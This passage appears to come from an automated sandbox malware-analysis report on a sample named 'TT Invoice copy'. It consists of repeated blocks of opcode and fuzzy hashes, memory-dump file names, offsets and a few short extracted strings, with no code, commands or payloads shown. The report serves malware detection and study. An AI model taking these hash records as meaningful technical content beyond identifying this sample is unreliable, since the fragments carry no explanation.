                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8cbc28e4c6f638a2ae544dd2d2494aa555df17f30bf317ffae1c1ba4df2bbc31
                                                                                  • Instruction ID: 20cda36cd8ece71af4329f805d3ebc7eebabe4f35e41e86bf1135087b78cf3c5
                                                                                  • Opcode Fuzzy Hash: 8cbc28e4c6f638a2ae544dd2d2494aa555df17f30bf317ffae1c1ba4df2bbc31
                                                                                  • Instruction Fuzzy Hash: 9851D130F642059BD704DBA8D890B7EBBB2FF85304F188566F4559B3C6DB748882CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 48ec5f412559a0a63a532078e0c58be162779c52f80f1cfad0d09079c949dff4
                                                                                  • Instruction ID: ec0e591d9ffcd17839e6fb95d16915bb74e26f6b8d9f4ff1802008a07028f787
                                                                                  • Opcode Fuzzy Hash: 48ec5f412559a0a63a532078e0c58be162779c52f80f1cfad0d09079c949dff4
                                                                                  • Instruction Fuzzy Hash: 8251C574E1511A9BCB04CFA9E5809AEBBF2FF48314F289555E419E7305D730A985CF50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b2caf9484ba66fe0a62e0a94f62a63ef219262aadaf963efb9adbd934f9c7549
                                                                                  • Instruction ID: 2cb62e032dd1415b3a6512a3cbe6f728f6e9ec44edb3007ac95692095de8f748
                                                                                  • Opcode Fuzzy Hash: b2caf9484ba66fe0a62e0a94f62a63ef219262aadaf963efb9adbd934f9c7549
                                                                                  • Instruction Fuzzy Hash: 1C313AB5A10249AFCF10DFA9D844ADEBFF5EF48310F10842AE909A7311D775A944CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fc0c00263a4cdebe8a916a9ea0d3c7d62534f9f66f3a5fd2f195d6d4f4ef7954
                                                                                  • Instruction ID: 2d50983429572635e395167475be245b0054036bc03c88778ec31a63a7beffe2
                                                                                  • Opcode Fuzzy Hash: fc0c00263a4cdebe8a916a9ea0d3c7d62534f9f66f3a5fd2f195d6d4f4ef7954
                                                                                  • Instruction Fuzzy Hash: 00319072A24596CFCB10CFA9D9946AEFBF1FF08310F048666E169E3241D734E580CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 858c1d9a8a4e1f41b5b207907d3f02a341a7187a75007e13f98d311cf3a8360b
                                                                                  • Instruction ID: 9d69ce950291a2fb513f9b752f17f33fd8dacf1f2d2307e46f6866891fa8b0bc
                                                                                  • Opcode Fuzzy Hash: 858c1d9a8a4e1f41b5b207907d3f02a341a7187a75007e13f98d311cf3a8360b
                                                                                  • Instruction Fuzzy Hash: 5F319E71A26146CBD704CF59E880AAAFBF6FF46308F588266E119DB351D274DE81CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1678951944.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9ad000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8da31cc2d4cf07ddece3947c694dd11c3f26890188fb3c8b63f874c54f42658d
                                                                                  • Instruction ID: db02f5342c6a9c0edf87e913622408940601229fed72a679456148c357560905
                                                                                  • Opcode Fuzzy Hash: 8da31cc2d4cf07ddece3947c694dd11c3f26890188fb3c8b63f874c54f42658d
                                                                                  • Instruction Fuzzy Hash: 24216771900200DFCB04DF04C9C4B27BFA9FB99318F24C569E80A0B65AC33AD846CBE2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1678951944.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9ad000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bdc47451803d45059dce1a892872b18a03f8780fb722b995932977324996534f
                                                                                  • Instruction ID: 2151084e9cf200cb3a15963f200c258420a1194b22edc32c4da93fa7f04f82f1
                                                                                  • Opcode Fuzzy Hash: bdc47451803d45059dce1a892872b18a03f8780fb722b995932977324996534f
                                                                                  • Instruction Fuzzy Hash: 41213771505200DFDB05DF14D9C0B27BFA6FB98324F20C569E90A4B6A6C33AE856C7E1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 314e828850b1f342fbdbc7b64baea12ee894a7ef1ebb3380da806be76ea8596f
                                                                                  • Instruction ID: 17029721e8c23ca156b2a6bc5fa2eb40d0179d5cafb0b646cffcafe937e4e433
                                                                                  • Opcode Fuzzy Hash: 314e828850b1f342fbdbc7b64baea12ee894a7ef1ebb3380da806be76ea8596f
                                                                                  • Instruction Fuzzy Hash: 6F21F930B60215DFD7188B19D818F2A7BE7FFC4B10F24C966E11A9F2D5DA7288818B51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679002099.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9bd000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 95246c67a7b5da18d3bac0699d33015ad3c8393a12dac4f9d965aa2ccf24aad2
                                                                                  • Instruction ID: 5eff6271012947e322346a8c2fc41a748b55f44844b8e04e1cd5c654d0d9a7a9
                                                                                  • Opcode Fuzzy Hash: 95246c67a7b5da18d3bac0699d33015ad3c8393a12dac4f9d965aa2ccf24aad2
                                                                                  • Instruction Fuzzy Hash: 0F213471604200DFCB14EF14DAC4B66BFA5FB88324F20C96DD80A4B296D33AD847CA61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679002099.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9bd000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 14e28546ad21586912ab873dae38404080a5c8355eb4eb30b0f04df71d9dc531
                                                                                  • Instruction ID: ea93431f941d49b82e0356b533e074c2fcd4ef6085636931c32b94a33f08b7a1
                                                                                  • Opcode Fuzzy Hash: 14e28546ad21586912ab873dae38404080a5c8355eb4eb30b0f04df71d9dc531
                                                                                  • Instruction Fuzzy Hash: FB212671504284EFDB05DF14DAC0B66BBA5FB84324F20CA6DE8194B296D33AD846CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 081034220d0ea6cbcaf366186f0dadb17d254bec4b7aaf5ef239ef2682dcb4cf
                                                                                  • Instruction ID: 3fb628bcd1543600cf92def3c87e19ed0fc2f310323466ca81c65ff23684e283
                                                                                  • Opcode Fuzzy Hash: 081034220d0ea6cbcaf366186f0dadb17d254bec4b7aaf5ef239ef2682dcb4cf
                                                                                  • Instruction Fuzzy Hash: 2011D330B64201EFE7248B15D805F2ABBE3FF84B11F24C566E51A9F2D5CA7688818B41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 561d3142c3337ba66ac482789be605b118be7662cc0f20fa5a254e1a3d202695
                                                                                  • Instruction ID: 12b7acbb59fc5b6e56ae8954b5ab30b3d499317c174fdd1e7b14881dbdc78e20
                                                                                  • Opcode Fuzzy Hash: 561d3142c3337ba66ac482789be605b118be7662cc0f20fa5a254e1a3d202695
                                                                                  • Instruction Fuzzy Hash: AE2100B5D002499FCB10DF9AD884ADEBBF4FB48320F10842AE919A7311C375A984CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1678951944.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9ad000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                  • Instruction ID: 3caf97abd4f7cadbaef36f03f5f92721d37baae8737a834d795e94b812412acc
                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                  • Instruction Fuzzy Hash: 32110376804240CFCB02CF00D5C4B16BF71FB94318F24C6A9E80A0B65AC33AD85ACBE1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1678951944.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9ad000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                  • Instruction ID: f6649a05b042b2cbed80d588dbb32db2d3efc04a72c7af84367d74da8d58fce7
                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                  • Instruction Fuzzy Hash: A2110376404240CFCB02CF00D5C4B16BFB2FB98324F24C5A9D8090B666C33AE85ACBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679002099.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9bd000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                  • Instruction ID: da28b4c941d4d99fa20e95bf7a2a83fcb26e087ebb62c906ca85ddda078d49fc
                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                  • Instruction Fuzzy Hash: 1D11BB75504284DFDB02CF10C6C4B55BFA1FB84324F24C6AAD8494B296C33AD80ACB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679002099.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9bd000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                  • Instruction ID: 6e729ddd3ef9c79037584ceac1ef4ade1cce5fb506a906f5b9ac18e27fb8d419
                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                  • Instruction Fuzzy Hash: 0C11DD75504280CFCB11DF14D6C4B56FFA2FB84324F28C6AAD8094B656C33AD80ACBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3e84acd74bf8ab7a8176a5010c05c3b7cfc7c74e1ebdb0f075cfb0feb32b30c7
                                                                                  • Instruction ID: 4d8a559c4712bfdecc99a3904b9077dffceb2c31caf3a66dc16538255a03eac8
                                                                                  • Opcode Fuzzy Hash: 3e84acd74bf8ab7a8176a5010c05c3b7cfc7c74e1ebdb0f075cfb0feb32b30c7
                                                                                  • Instruction Fuzzy Hash: 9611A4B1D106189BEB18CF9BC9557DEFEF7AFC8300F14C06AD40966254DBB509468F90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1a374399ff0848fab26f5315b2f743accda70dee2160780c00f89fa62d2c404f
                                                                                  • Instruction ID: 8e664e2192910b69048a91fcb82d68a37862bd3a4593e5a434e6f98057e66fb9
                                                                                  • Opcode Fuzzy Hash: 1a374399ff0848fab26f5315b2f743accda70dee2160780c00f89fa62d2c404f
                                                                                  • Instruction Fuzzy Hash: A6110670D24218DFC708EFAAC4449ADBBB6BF89310F04A069E419B7251CB759981CF50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1678951944.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9ad000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3faf03663a6d5f19160856110f6d28d45cc18fcee15ece17dd3a9fb21abb706b
                                                                                  • Instruction ID: 1a763084dd661d66cf4dce6880edf07e6eb91118df5579e658f9483247e2e70b
                                                                                  • Opcode Fuzzy Hash: 3faf03663a6d5f19160856110f6d28d45cc18fcee15ece17dd3a9fb21abb706b
                                                                                  • Instruction Fuzzy Hash: 8A012BB100A3409AE7144E29CD84B67FFDCDF42334F18C92AED0A4A696C679D840C6F1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d590772ad9bc9357eea290da32ebc5d99f22897a2798dd8141eb448086d86818
                                                                                  • Instruction ID: 25e0724ec4b27cf3a828c20dd2ed2b89c5f814d6fdd5d0defc14735a1ce7b01a
                                                                                  • Opcode Fuzzy Hash: d590772ad9bc9357eea290da32ebc5d99f22897a2798dd8141eb448086d86818
                                                                                  • Instruction Fuzzy Hash: 72014B38A29108EFC704EFA8C584AACBBF6EF49300F14D094E449AB311CB709E40DB40
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 58791f6108573da24a92a2c718398cba6b5d772d6ac7df32deb3e2b6a23ec2ab
                                                                                  • Instruction ID: 67fae8e4fdba4e565beda1cc1861accfaabed79ff322b5aa28cdc4d35b720fae
                                                                                  • Opcode Fuzzy Hash: 58791f6108573da24a92a2c718398cba6b5d772d6ac7df32deb3e2b6a23ec2ab
                                                                                  • Instruction Fuzzy Hash: E7F0AF7092D108DBC715EF5AC4449BCFBBAAF4A300F10E1A894496B212DBB09E81DB80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 390cf772060e26781fe224c9d0b896a67d532cac37045cf7392e1a5e591e8b12
                                                                                  • Instruction ID: f3f1b9c4b2a650f1742b83dd52ae97d5900275e82fdd011678ca4ca56379d466
                                                                                  • Opcode Fuzzy Hash: 390cf772060e26781fe224c9d0b896a67d532cac37045cf7392e1a5e591e8b12
                                                                                  • Instruction Fuzzy Hash: 6BF0A470A28149CFD740FFA4D4557ADBFBEAF44300F009825E01662295CF74548ACB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1678951944.00000000009AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_9ad000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 88c20717e6173280a3f5484cf6dac167f96d02ce6f0e8484f20653b5f8f2f460
                                                                                  • Instruction ID: 3e1d66939da29f3b6dc896d1d6dd979d9ee52d6ca21ab5afcbbc94d01c887fe3
                                                                                  • Opcode Fuzzy Hash: 88c20717e6173280a3f5484cf6dac167f96d02ce6f0e8484f20653b5f8f2f460
                                                                                  • Instruction Fuzzy Hash: 41F062714053449AEB148E1AC888B62FFACEB51734F18C45AED094A696C6799844CAB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e12268d11e81925302baed7b54e4afc82c880d697ef72d989ba91d0b5ab8b70d
                                                                                  • Instruction ID: 921aab7e3122ac11f77120de4229260bc56542305f644630edb1c41ac94a79de
                                                                                  • Opcode Fuzzy Hash: e12268d11e81925302baed7b54e4afc82c880d697ef72d989ba91d0b5ab8b70d
                                                                                  • Instruction Fuzzy Hash: 81F0C2B4A202068FC704CF58D444AAFBFF1EF48318F0886AD9111DB281CB759444CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8a55bd8d82e38b22a6a227c3772b54c1214ae92c5249d2e7862535f6c899bfba
                                                                                  • Instruction ID: 0e58fffda24fa7eceedd26ec29015eca68053b2d06c555d5e290b7db44a935c9
                                                                                  • Opcode Fuzzy Hash: 8a55bd8d82e38b22a6a227c3772b54c1214ae92c5249d2e7862535f6c899bfba
                                                                                  • Instruction Fuzzy Hash: DCF03072714009AF9F08DF58D8848AE7FFAEF88254F14817AE409D7224E631E9918B50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b9d8537e8ed3ed2a8948ea273353293753fbb79eb41db12a7d96d40051a94baf
                                                                                  • Instruction ID: 8095f02bbf0fe9b6059ec9c11efc00e6cc3d6d723f9fe133351417b8a3a3f5ff
                                                                                  • Opcode Fuzzy Hash: b9d8537e8ed3ed2a8948ea273353293753fbb79eb41db12a7d96d40051a94baf
                                                                                  • Instruction Fuzzy Hash: FDF0DAB0D1420A9FDB44DFA9D841ABEBBF5FF48304F1485A9D918E7305D77495448F90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: n
                                                                                  • API String ID: 0-3297054318
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: h!
                                                                                  • API String ID: 0-64874769
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679915347.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e60000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'^q
                                                                                  • API String ID: 0-1614139903
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
